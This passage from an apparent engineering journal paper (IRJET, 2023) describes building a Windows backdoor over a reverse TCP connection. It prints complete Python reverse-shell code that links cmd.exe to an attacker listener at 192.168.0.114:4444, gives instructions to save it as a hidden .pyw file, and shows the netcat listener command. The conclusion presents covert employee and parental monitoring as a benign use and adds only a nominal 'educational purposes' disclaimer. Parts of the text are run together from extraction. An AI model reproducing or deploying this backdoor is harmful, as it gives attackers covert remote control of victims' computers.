connection), it is allowed, and a host-initiated return connection is allowed. Fig-5: Reverse TCP Basically, it is not the attacker who initiates a connection, which of course would be blocked by the firewall, but the device which initiates a connection to the attacker, which would be allowed by the firewall.fire,thentheattackertakes control of the device and goes through work. It is a type of reverse shell. Fig-6
  • 5. International Research Journal of Engineering and Technology (IRJET) e-ISSN: 2395-0056 Volume: 10 Issue: 03 | Mar 2023 www.irjet.net p-ISSN: 2395-0072 © 2023, IRJET | Impact Factor value: 8.226 | ISO 9001:2008 Certified Journal | Page 1231 11. CODE AND IMPLEMENTATION Fig-7: Code import os,socket,subprocess,threading; def s2p(s, p): while True: data = s.recv(1024) if len(data) > 0: p.stdin.write(data) p.stdin.flush() def p2s(s, p): while True: s.send(p.stdout.read(1)) s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("192.168.0.114",4444)) p=subprocess.Popen(["windowssystem32cmd.exe"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE) s2p_thread = threading.Thread(target=s2p, args=[s, p]) s2p_thread.daemon = True s2p_thread.start() p2s_thread = threading.Thread(target=p2s, args=[s, p]) p2s_thread.daemon = True p2s_thread.start() try: p.wait() except KeyboardInterrupt: s.close() It is necessary to have two Windows workstationsandLinux machines to set up this project. First create a python file and write the above script and save it with .pyw extension,it will run the python file in the background. Now thesystemstarts sending connection packets to the above IP address through the above port number. Now run the followingcommand on the Linux machine nc -nlvp 4444 This command uses the netcat tool to listen for any connection on port number 4444. If either machine sends a connection to the Linux machine, it will easily accept it and establish a connection between the two machines. The reverse TCP connection is established successfully, and the Windows system commandpromptisdisplayedontheLinux machine with user rights. 12. OUTPUTS Fig-8: Output-1 Fig-9: Output-2
  • 6. International Research Journal of Engineering and Technology (IRJET) e-ISSN: 2395-0056 Volume: 10 Issue: 03 | Mar 2023 www.irjet.net p-ISSN: 2395-0072 © 2023, IRJET | Impact Factor value: 8.226 | ISO 9001:2008 Certified Journal | Page 1232 13. CONCLUSION The technical advantage of backdoors is the ability to monitor remote systems. It is most likely to be used by software companies who can monitor employee computers to improve productivity. Parental monitoringisalsopossible with this backdoor software. Firewalls cannot detect backdoors as malware, so Windows computersprotected by firewalls are extremely vulnerable to backdoors that can be easily exploited and gain remote access. This backdoor has positive and negative uses. Some negative ways of using a backdoor are to establish a connectiontoa computerthat we do not have access to. The backdoors we created are for educational purposes only and cannot be used foranyillegal purpose. REFERENCES [1] Eman Esmaeel Hamed and Muna Majeed lafta, "Intrusion WindowsXP byBackdoorTool",Journal ofAl- NahrainUniversity,Vol.11(3),December,2008M. Young, The Technical Writer’s Handbook. Mill Valley, CA: University Science, 1989. [2] Chris Wysopal and Chris Eng, "Static Detection of Application of Backdoors", Veracode Inc. [3] Exploring windows back door – bypassing firewall on webhosting providers https://dl.packetstormsecurity.net/papers/general/my _research1.pdf